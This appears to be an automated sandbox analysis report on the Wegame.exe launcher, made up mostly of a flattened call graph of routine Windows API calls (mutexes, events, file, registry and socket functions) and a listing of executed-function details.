71487 6bd2554e 71485->71487 71486->71487 71496 6bd2500d __EH_prolog3 71487->71496 71489 6bd255ca 71492 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71489->71492 71493 6bd255e1 71489->71493 71490 6bd2558f 71490->71489 71491 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71490->71491 71491->71489 71492->71493 71495 6bd2561a 71493->71495 71501 6bd5f62a 71493->71501 71497 6be22dcc std::_Facet_Register 4 API calls 71496->71497 71498 6bd2502b 71497->71498 71500 6bd25055 71498->71500 71504 6bd24630 71498->71504 71500->71490 71502 6bd5f3ef 71501->71502 71503 6bd5f647 SetWaitableTimer 71502->71503 71503->71495 71507 6bd25922 __EH_prolog3_GS ?current_path@filesystem@ierd_tgp@@YA?AVpath@12 71504->71507 71506 6bd24672 71506->71500 71508 6bd259aa 71507->71508 71547 6bd27457 __EH_prolog3_GS 71508->71547 71510 6bd259ba 71550 6bd25892 __EH_prolog3_GS memset 71510->71550 71512 6bd25a67 71513 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71512->71513 71514 6bd25a73 71513->71514 71515 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71514->71515 71516 6bd25a82 71515->71516 71517 6bd25892 5 API calls 71516->71517 71518 6bd25ac1 71517->71518 71519 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71518->71519 71529 6bd25acd 71519->71529 71520 6bd25bfc ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD CreateEventA 71521 6bd25c4d WaitForSingleObject 71520->71521 71523 6bd25c77 71520->71523 71522 6bd25ca6 ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD CreateEventA ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD OpenEventA 71521->71522 71521->71523 71525 6bd25d12 SetEvent CloseHandle 71522->71525 71526 6bd25d20 GetCommandLineW 71522->71526 71524 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71523->71524 71527 6bd25e53 71524->71527 71525->71526 71528 6bd19a8e 71526->71528 71527->71506 71530 6bd25d32 ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@ ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD FindWindowA IsWindow 71528->71530 71529->71520 71536 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71529->71536 71546 6bd25bf0 71529->71546 71531 6bd25dd7 WaitForSingleObject 71530->71531 71532 6bd25dbc 71530->71532 71534 6bd25e61 71531->71534 71535 6bd25de8 71531->71535 71532->71531 71533 6bd25dc5 SendMessageA 71532->71533 71533->71531 71540 6bd25e8d _CxxThrowException 71534->71540 71535->71534 71537 6bd25df3 71535->71537 71536->71529 71538 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71537->71538 71539 6bd25dff 71538->71539 71541 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71539->71541 71542 6bd25e0b 71541->71542 71543 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71542->71543 71544 6bd25e26 71543->71544 71545 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71544->71545 71545->71523 71546->71520 71557 6bd260aa __EH_prolog3_GS CryptAcquireContextW 71547->71557 71549 6bd27474 71549->71510 71551 6bd258c3 71550->71551 71552 6bd258c5 ?get_prefix@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 71550->71552 71551->71552 71553 6bd258db 71552->71553 71554 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71553->71554 71555 6bd25907 CreateMutexA 71554->71555 71556 6bd2591f 71555->71556 71556->71512 71558 6bd260d0 71557->71558 71559 6bd260d8 GetLastError 71557->71559 71558->71549 71560 6bd260ed 71559->71560 71561 6be2452a 71562 6be24533 ___security_init_cookie 71561->71562 71563 6be24538 dllmain_dispatch 71561->71563 71562->71563 71564 1001c4cc 71569 1001c4df _rand 71564->71569 71565 1001c518 HeapAlloc 71565->71569 71570 1001c543 _rand 71565->71570 71569->71565 71569->71570 71571 1001c66f 71569->71571 71586 1001d3d8 71569->71586 71594 1001c6d0 LeaveCriticalSection 71569->71594 71572 1001c6c5 EnterCriticalSection 71571->71572 71573 1001c687 71571->71573 71572->71569 71595 1001cd60 20 API calls _wctomb_s 71573->71595 71575 1001c68f 71576 1001c69d 71575->71576 71596 1001b987 7 API calls _rand 71575->71596 71577 1001c66f _wctomb_s 18 API calls 71576->71577 71579 1001c6a5 71577->71579 71580 1001c6b6 71579->71580 71581 1001c6ac InitializeCriticalSection 71579->71581 71597 10017d34 20 API calls 2 library calls 71580->71597 71582 1001c6bb 71581->71582 71598 1001c6d0 LeaveCriticalSection 71582->71598 71585 1001c6c3 71585->71572 71587 1001d40a 71586->71587 71588 1001d4b2 71587->71588 71593 1001d4c6 71587->71593 71599 1001d6e1 71587->71599 71606 1001d792 VirtualAlloc 71588->71606 71590 1001d4b8 71590->71593 71593->71569 71594->71569 71595->71575 71596->71576 71597->71582 71598->71585 71600 1001d724 HeapAlloc 71599->71600 71601 1001d6f4 HeapReAlloc 71599->71601 71603 1001d74a VirtualAlloc 71600->71603 71605 1001d4a9 71600->71605 71602 1001d713 71601->71602 71601->71605 71602->71600 71604 1001d764 HeapFree 71603->71604 71603->71605 71604->71605 71605->71588 71605->71593 71606->71590 71607 6bdcd992 __EH_prolog3_GS 71608 6bdcd9ae ?instance@Application@common@ierd_tgp@@SAPAV123 ?get_workingdir_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3 ??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W GetPrivateProfileIntW 71607->71608 71609 6bdcd9a7 71607->71609 71608->71609 71610 6bda8c15 CreateFileMappingW 71611 6bda8c4d 71610->71611 71612 6bda8c33 MapViewOfFile 71610->71612 71612->71611 71613 6bdba70e __EH_prolog3_GS 71614 6bdba72a SHCreateDirectoryExW 71613->71614 71615 6bdba728 71613->71615 71616 6bdba743 71614->71616 71618 6bdba812 71614->71618 71615->71614 71617 6bd2a76f 27 API calls 71616->71617 71616->71618 71619 6bdba75e 71617->71619 71620 6bdba7a7 ?get_log_instance@base@@YAPAVILogger@1 71619->71620 71621 6bdba7f7 71620->71621 71623 6bdba7b2 71620->71623 71622 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71621->71622 71622->71618 71623->71621 71624 6bd1e945 17 API calls 71623->71624 71624->71621 71625 6bd1c484 __EH_prolog3_catch_GS 71626 6bd1c4a6 71625->71626 71627 6bd1c4cd ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N 71626->71627 71628 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71627->71628 71630 6bd1c4f0 71628->71630 71629 6bd1c598 ?get_log_instance@base@@YAPAVILogger@1 71631 6bd1c5e2 71629->71631 71632 6bd1c5a3 71629->71632 71630->71629 71632->71631 71633 6bd1e945 17 API calls 71632->71633 71633->71631 71634 6bf6ffa0 connect 71635 6bf70089 71634->71635 71636 6bf6ffda WSAGetLastError 71634->71636 71636->71635 71637 6bf6ffeb 71636->71637 71637->71635 71638 6bf7005e select 71637->71638 71638->71635 71639 6bf70078 71638->71639 71639->71635 71640 6bf7007a __WSAFDIsSet 71639->71640 71640->71635 71641 6bf6fe20 strchr 71642 6bf6fe67 71641->71642 71643 6bf6feaa 71641->71643 71644 6bf6fe77 memmove 71642->71644 71648 6bf6ff0d 71642->71648 71643->71648 71649 6bf6fed6 htons strspn 71643->71649 71645 6bf6fe92 71644->71645 71646 6bf6ff5b 71644->71646 71645->71643 71647 6bf6fe9c atoi 71645->71647 71647->71649 71650 6bf6ff00 71649->71650 71650->71648 71650->71650 71651 6bf6ff3e gethostbyname 71650->71651 71651->71648 71652 6bd5f78d __EH_prolog3_GS ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@ 71653 6bd5f7ce GetFileVersionInfoSizeW 71652->71653 71657 6bd5f848 71652->71657 71654 6bd5f7f4 71653->71654 71653->71657 71655 6bd5f811 GetFileVersionInfoW 71654->71655 71656 6bd5f82f VerQueryValueA 71655->71656 71655->71657 71656->71657 71658 6bd1c60a __EH_prolog3_catch_GS 71659 6bd1c629 71658->71659 71660 6bd1c64e ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N 71659->71660 71661 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71660->71661 71662 6bd1c671 71661->71662 71663 6bd1c68b ?get_log_instance@base@@YAPAVILogger@1 71662->71663 71664 6bd1c696 71663->71664 71665 6bd31608 __EH_prolog3 71666 6bd3162c 71665->71666 71669 6bd31d7b __EH_prolog3_GS 71666->71669 71668 6bd3163e 71670 6bd31d93 71669->71670 71671 6bd31b55 __EH_prolog3_GS 71670->71671 71672 6bd31db1 GetTickCount 71671->71672 71673 6bd31dcd 71672->71673 71674 6bd30f05 52 API calls 71673->71674 71675 6bd31e2f 71673->71675 71674->71675 71675->71668 71676 6bd03b8d 71679 6be24196 71676->71679 71678 6bd03ba5 71680 6be241a2 71679->71680 71681 6be241b2 ?shutdown@Application@common@ierd_tgp@ 71680->71681 71682 6be241cd 71680->71682 71684 6bd8f7a0 __EH_prolog3 71681->71684 71682->71678 71689 6bd8f960 RegOpenKeyExA 71684->71689 71687 6be22dcc std::_Facet_Register 4 API calls 71688 6bd8f7ba 71687->71688 71688->71680 71690 6bd8f7b3 71689->71690 71691 6bd8f991 RegQueryValueExA RegCloseKey 71689->71691 71690->71687 71691->71690 71692 6bd60bb7 71693 6bd60bc5 71692->71693 71696 6bd60b62 71693->71696 71695 6bd60bd9 71697 6bd60b72 CopyFileW 71696->71697 71699 6bd60b96 GetLastError 71697->71699 71700 6bd60b9e 71697->71700 71699->71700 71700->71695 71701 6bd32332 71704 6bd38344 __EH_prolog3 WaitForSingleObject 71701->71704 71703 6bd3233d 71705 6bd38373 71704->71705 71708 6bd3840a 71704->71708 71706 6bd38379 EnterCriticalSection 71705->71706 71707 6bd38390 LeaveCriticalSection 71705->71707 71705->71708 71709 6bd383f4 WaitForSingleObject 71705->71709 71710 6bd383b3 WaitForSingleObject 71705->71710 71706->71705 71707->71705 71708->71703 71709->71706 71709->71708 71710->71705 71710->71710 71711 6be26000 _beginthreadex 71712 6be26025 71711->71712 71713 6be2602a 71711->71713 71714 6be26048 ResumeThread 71713->71714 71715 6be26041 CloseHandle 71713->71715 71715->71714 71716 6be35d00 71717 6be35d3a 71716->71717 71718 6be35d0a socket 71716->71718 71719 6be35d1b 71718->71719 71720 6be35d28 71718->71720 71722 6be3de60 71720->71722 71723 6be3de96 closesocket 71722->71723 71724 6be3de6e 71722->71724 71723->71717 71724->71723 71725 6be3dea2 71724->71725 71725->71717 71726 401125 GetSystemInfo 71727 6be2420a 71728 6be24215 71727->71728 71729 6be24248 dllmain_crt_process_detach 71727->71729 71730 6be2423a dllmain_crt_process_attach 71728->71730 71731 6be2421a 71728->71731 71729->71731 71730->71731 71732 6bd3b8b9 71733 6bd3b8c3 71732->71733 71734 6bd3b8de 71732->71734 71733->71734 71735 6bd3b8d0 fflush 71733->71735 71735->71734 71736 1001b8ea 71737 1001b906 71736->71737 71739 1001b8fd 71736->71739 71737->71739 71743 1001b92e 71737->71743 71744 1001b811 71737->71744 71740 1001b94e 71739->71740 71741 1001b811 83 API calls 71739->71741 71739->71743 71742 1001b811 83 API calls 71740->71742 71740->71743 71741->71740 71742->71743 71745 1001b8a6 71744->71745 71746 1001b81e GetVersion 71744->71746 71748 1001b8d8 71745->71748 71750 1001b8ac 71745->71750 71773 1001cf93 HeapCreate 71746->71773 71754 1001b871 71748->71754 71790 1001ced8 22 API calls ___free_lc_time 71748->71790 71749 1001b830 71749->71754 71780 1001cdec 28 API calls _rand 71749->71780 71752 1001b8c7 71750->71752 71750->71754 71786 1001845e 23 API calls 71750->71786 71787 1001c478 21 API calls ___free_lc_time 71752->71787 71754->71739 71757 1001b8cc 71788 1001ce40 26 API calls 71757->71788 71758 1001b868 71760 1001b875 GetCommandLineA 71758->71760 71761 1001b86c 71758->71761 71782 10024e85 28 API calls 2 library calls 71760->71782 71781 1001cfcf VirtualFree VirtualFree HeapFree HeapFree HeapDestroy 71761->71781 71763 1001b8d1 71789 1001cfcf VirtualFree VirtualFree HeapFree HeapFree HeapDestroy 71763->71789 71765 1001b885 71783 1001c2bc 25 API calls 2 library calls 71765->71783 71768 1001b88f 71784 10024c38 40 API calls 2 library calls 71768->71784 71770 1001b894 71785 10024b7f 39 API calls 3 library calls 71770->71785 71772 1001b899 71772->71754 71774 1001cfb3 71773->71774 71775 1001cfc8 71773->71775 71791 1001d044 HeapAlloc 71774->71791 71775->71749 71777 1001cfb8 71778 1001cfcb 71777->71778 71779 1001cfbc HeapDestroy 71777->71779 71778->71749 71779->71775 71780->71758 71781->71754 71782->71765 71783->71768 71784->71770 71785->71772 71786->71752 71787->71757 71788->71763 71789->71754 71790->71754 71791->71777 71792 6bd8dda8 ?get_client_id@util_client_info@ierd_tgp@ 71793 6bdb2da9 GetModuleHandleA GetProcAddress 71794 6bdb2dd8 71793->71794 71795 6bdb2ddc GetNativeSystemInfo 71793->71795 71795->71794 71796 6be4c310 71797 6be4c319 71796->71797 71798 6be4c368 71797->71798 71799 6be4c32a 71797->71799 71800 6be4c370 71798->71800 71801 6be4c39f realloc 71798->71801 71802 6be4c33a 71799->71802 71803 6be4c354 malloc 71799->71803 71804 6be4c393 free 71800->71804 71805 6be4c382 71800->71805 71804->71802 71806 6bdcd02a __EH_prolog3_GS 71807 6bdcd04c 71806->71807 71809 6bdcd042 71806->71809 71808 6bdcd086 memset GetModuleHandleW GetModuleFileNameW 71807->71808 71810 6bdcd0eb 71808->71810 71810->71809 71811 6bdcd18f PathFileExistsW 71810->71811 71811->71809 71812 6bdcd1b2 71811->71812 71813 6bdcd203 ?decode_stream@common@ierd_tgp@@YA?AV?$optional@V?$reference_wrapper@V?$basic_istringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@std@@@std@@AAV?$basic_istream@DU?$char_traits@D@std@@@4@AAV?$basic_istringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@4@ 71812->71813 71815 6bdcd2e3 71812->71815 71814 6bdcd2c8 71813->71814 71818 6bdcd22f 71813->71818 71817 6bdcd2d7 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 71814->71817 71816 6bdcd2fd ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 71815->71816 71816->71809 71817->71815 71819 6bdcd2b9 71818->71819 71820 6bdcd291 atoi 71818->71820 71821 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71819->71821 71820->71819 71821->71814 71822 6bd9182f __EH_prolog3 71823 6be22dcc std::_Facet_Register 4 API calls 71822->71823 71824 6bd9184b 71823->71824 71825 43ef34 71828 43e902 71825->71828 71829 43e911 __EH_prolog3_GS 71828->71829 71830 43e926 PathFileExistsW 71829->71830 71831 43e937 ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@ 71830->71831 71832 43ea53 71830->71832 71834 43e963 SHCreateDirectoryExW 71831->71834 71835 43e961 71831->71835 71833 40f180 16 API calls 71832->71833 71836 43ea6c PathFileExistsW 71833->71836 71837 43e9e4 ?get_log_instance@base@@YAPAVILogger@1 71834->71837 71838 43e974 71834->71838 71835->71834 71839 43ea8f CreateFileW 71836->71839 71840 43ea47 71837->71840 71852 43e9ef 71837->71852 71838->71837 71841 43e97c ?get_log_instance@base@@YAPAVILogger@1 71838->71841 71844 43eb33 memset 71839->71844 71845 43eac6 ?get_log_instance@base@@YAPAVILogger@1 71839->71845 71842 420c80 ~refcount_ptr _invalid_parameter_noinfo_noreturn 71840->71842 71841->71840 71855 43e98b 71841->71855 71842->71832 71846 43eb4b ReadFile 71844->71846 71847 43ec1e ?get_log_instance@base@@YAPAVILogger@1 71844->71847 71848 43ead5 71845->71848 71886 43eb2e 71845->71886 71850 43ebbe ?get_log_instance@base@@YAPAVILogger@1 71846->71850 71851 43eb6c ?get_log_instance@base@@YAPAVILogger@1 71846->71851 71853 43ec9a 71847->71853 71864 43ec29 71847->71864 71871 43eb02 GetLastError 71848->71871 71848->71886 71849 40bbd0 Mailbox _invalid_parameter_noinfo_noreturn 71854 43ed9a 71849->71854 71850->71847 71866 43ebc9 71850->71866 71851->71847 71879 43eb7b 71851->71879 71852->71840 71862 43f4bb 21 API calls 71852->71862 71856 43eca8 GetLocalTime WriteFile 71853->71856 71897 43eda0 41 API calls 3 library calls 71853->71897 71857 46e420 5 API calls 71854->71857 71855->71840 71858 43e9b8 GetLastError 71855->71858 71860 43ecd3 ?get_log_instance@base@@YAPAVILogger@1 71856->71860 71861 43ed25 ?get_log_instance@base@@YAPAVILogger@1 71856->71861 71865 43ed9f 71857->71865 71869 43f4bb 21 API calls 71858->71869 71868 43ed87 CloseHandle 71860->71868 71870 43ece2 71860->71870 71867 43ed30 71861->71867 71861->71868 71863 43e9df 71862->71863 71893 43e231 _invalid_parameter_noinfo_noreturn 71863->71893 71864->71853 71874 43f4bb 21 API calls 71864->71874 71866->71847 71876 43ebf2 GetLastError 71866->71876 71867->71868 71877 43ed3f 71867->71877 71868->71886 71869->71863 71870->71868 71878 43ecf4 71870->71878 71873 43f4bb 21 API calls 71871->71873 71875 43eb1c 71873->71875 71881 43ec88 71874->71881 71894 43e231 _invalid_parameter_noinfo_noreturn 71875->71894 71883 43f4bb 21 API calls 71876->71883 71887 43ed5c GetLastError 71877->71887 71888 43f4bb 21 API calls 71878->71888 71879->71847 71880 43f4bb 21 API calls 71879->71880 71884 43ebb9 71880->71884 71896 43e231 _invalid_parameter_noinfo_noreturn 71881->71896 71883->71884 71895 43e231 _invalid_parameter_noinfo_noreturn 71884->71895 71886->71849 71889 43f4bb 21 API calls 71887->71889 71890 43ed20 71888->71890 71889->71890 71898 43e231 _invalid_parameter_noinfo_noreturn 71890->71898 71893->71840 71894->71886 71895->71847 71896->71853 71897->71856 71898->71868 71899 6bd23a28 _beginthreadex 71900 6bd23a67 71899->71900 71901 6bd61bad 71902 6bd16b70 71901->71902 71903 6bd61bbb ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@ 71902->71903 71904 6bd571ae __EH_prolog3_GS 71905 6bd19a0e 71904->71905 71906 6bd571c7 ?is_profile_on@common@ierd_tgp@ 71905->71906 71907 6bd571d3 71906->71907 71908 6bd57219 71906->71908 71910 6bd571f7 ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N 71907->71910 71909 6bd57234 71908->71909 71911 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71908->71911 71912 6bd57242 ?enable_profile_on@common@ierd_tgp@@YAX_N 71909->71912 71913 6bd5724c 71909->71913 71910->71908 71911->71909 71912->71913 71914 6bd874a3 __EH_prolog3_catch_GS 71915 6bd874eb 71914->71915 71917 6bd877fb 71914->71917 71916 6bd87536 GetAdaptersInfo 71915->71916 71926 6bd874f4 71915->71926 71918 6bd87568 GetAdaptersInfo 71916->71918 71919 6bd87554 71916->71919 71917->71915 71920 6bd8783a __Init_thread_footer 71917->71920 71921 6bd87582 71918->71921 71918->71926 71919->71918 71920->71915 71922 6bd87609 71921->71922 71923 6bd87592 ?get_log_instance@base@@YAPAVILogger@1 71921->71923 71924 6bd0f200 15 API calls 71922->71924 71925 6bd8759d 71923->71925 71923->71926 71930 6bd87643 71924->71930 71925->71926 71927 6bd1e945 17 API calls 71925->71927 71927->71926 71928 6bd87726 71929 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71928->71929 71929->71926 71930->71928 71931 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71930->71931 71931->71928 71932 6bd398ae __EH_prolog3_GS 71933 6bd398da 71932->71933 71936 6bd3c3ab __EH_prolog3 71933->71936 71935 6bd398fb 71937 6bd3c3c4 71936->71937 71937->71935 71938 6bd4702b __EH_prolog3_catch_GS 71939 6bd44339 71938->71939 71940 6bd4705c ?split_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV34@1 71939->71940 71941 6bd470d1 ?get_file_path_by_key@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAVpath@filesystem@2@ 71940->71941 71944 6bd470a6 71940->71944 71943 6bd47114 71941->71943 71941->71944 71942 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71945 6bd470b2 71942->71945 71947 6bd4712c 71943->71947 71948 6bd47169 ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@ ?get_log_instance@base@@YAPAVILogger@1 71943->71948 71944->71942 71946 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71945->71946 71956 6bd470be 71946->71956 71950 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71947->71950 71955 6bd47196 71948->71955 71949 6bd47204 71951 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71949->71951 71952 6bd47148 71950->71952 71953 6bd47210 71951->71953 71954 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71952->71954 71957 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71953->71957 71954->71956 71955->71949 71959 6bd1e945 17 API calls 71955->71959 71958 6bd4722c 71957->71958 71960 6bd0a3a0 _invalid_parameter_noinfo_noreturn 71958->71960 71959->71955 71960->71956

                                                                Executed Functions

                                                                Function 0046CA3B Relevance: 205.9, APIs: 80, Strings: 37, Instructions: 1190stringsynchronizationwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 0046CA45
                                                                • GetCommandLineW.KERNEL32(000001A8), ref: 0046CA5C
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0046CAA7
                                                                  • Part of subcall function 0045D5EA: __EH_prolog3_GS.LIBCMT ref: 0045D5F4
                                                                  • Part of subcall function 0045D5EA: memset.VCRUNTIME140(?,00000000,00000208,00000254), ref: 0045D678
                                                                  • Part of subcall function 0045D5EA: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0045D68D
                                                                  • Part of subcall function 0045D5EA: SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045D6A0
                                                                  • Part of subcall function 0045D5EA: wcsrchr.VCRUNTIME140(?,0000005C), ref: 0045D6AE
                                                                  • Part of subcall function 0045D5EA: SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045D6C5
                                                                  • Part of subcall function 0045D5EA: SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045D6DC
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                • MessageBoxA.USER32(00000000,debug,debug,00000000), ref: 0046CAD0
                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stamp_record), ref: 0046CAE3
                                                                • ?stamp_init@@YAXXZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0046CAEE
                                                                • ?stamp_point@@YAXPBD@Z.COMMON(main_start), ref: 0046CAF8
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0046CAFE
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?), ref: 0046CB8C
                                                                • ?get_client_id@util_client_info@ierd_tgp@@YAHXZ.COMMON(wegame.exe,0000000A), ref: 0046CBD8
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAV45@@Z.COMMON(?,?,multi_launcher,0000000E,wegame.exe,0000000A), ref: 0046CC39
                                                                • ?get_process_count@util_multi_instance@ierd_tgp@@YAHPBD@Z.COMMON(?,multi_launcher,0000000E,wegame.exe,0000000A), ref: 0046CC58
                                                                • ?set_same_client_type_multi_instance@util_multi_instance@ierd_tgp@@YAX_N@Z.COMMON(00000001,multi_launcher,0000000E,wegame.exe,0000000A), ref: 0046CC64
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(multi_launcher,0000000E,wegame.exe,0000000A), ref: 0046CC6A
                                                                • ?SetIsMultiInstance@Qos@qos@adapt_for_imports@ierd_tgp@@QAEX_N@Z.COMMON(00000001,multi_launcher,0000000E,wegame.exe,0000000A), ref: 0046CC72
                                                                  • Part of subcall function 00420C80: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0043E0C9,85A35C35,?,?,?,00474220,000000FF,?,0043E01E,85A35C35,?,?,?,004741CF,000000FF), ref: 00420CC5
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                • ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z.COMMON(?,_TGP_EXISTS_MUTEX_NAME_), ref: 0046CCAC
                                                                • OutputDebugStringA.KERNEL32(?), ref: 0046CCCC
                                                                • CreateMutexA.KERNEL32(00000000,00000001,?), ref: 0046CCF4
                                                                • GetLastError.KERNEL32 ref: 0046CD15
                                                                • ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z.COMMON(?,31F73356-9B60-4B52-9FF0-F27E3A9BBEC2), ref: 0046CD2F
                                                                • OpenEventA.KERNEL32(001F0003,00000000,?), ref: 0046CD4C
                                                                • SetEvent.KERNEL32(00000000), ref: 0046CD59
                                                                • CloseHandle.KERNEL32(00000000), ref: 0046CD66
                                                                • CloseHandle.KERNEL32(?), ref: 0046CD77
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0046CD7E
                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 0046CDD8
                                                                • TerminateProcess.KERNEL32(00000000), ref: 0046CDDF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@SimpleString::operator=U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@$?get_coexist_name@util_multi_instance@ierd_tgp@@?get_log_instance@base@@CloseEventHandleLogger@1@Process_invalid_parameter_noinfo_noreturn$?extract_op_from_cmd@?get_client_id@util_client_info@ierd_tgp@@?get_process_count@util_multi_instance@ierd_tgp@@?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@?set_same_client_type_multi_instance@util_multi_instance@ierd_tgp@@?stamp_init@@?stamp_point@@?u16to8@common@ierd_tgp@@CommandCreateCurrentD@2@@4@@DebugErrorFileH_prolog3_H_prolog3_catch_Instance@LastLineMessageModuleMultiMutexNameOpenOutputQos@123@Qos@qos@adapt_for_imports@ierd_tgp@@StringSys_wrapper@common@ierd_tgp@@TerminateU?$char_traits@_V45@@V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@memmovememsetstrcmpwcsrchr
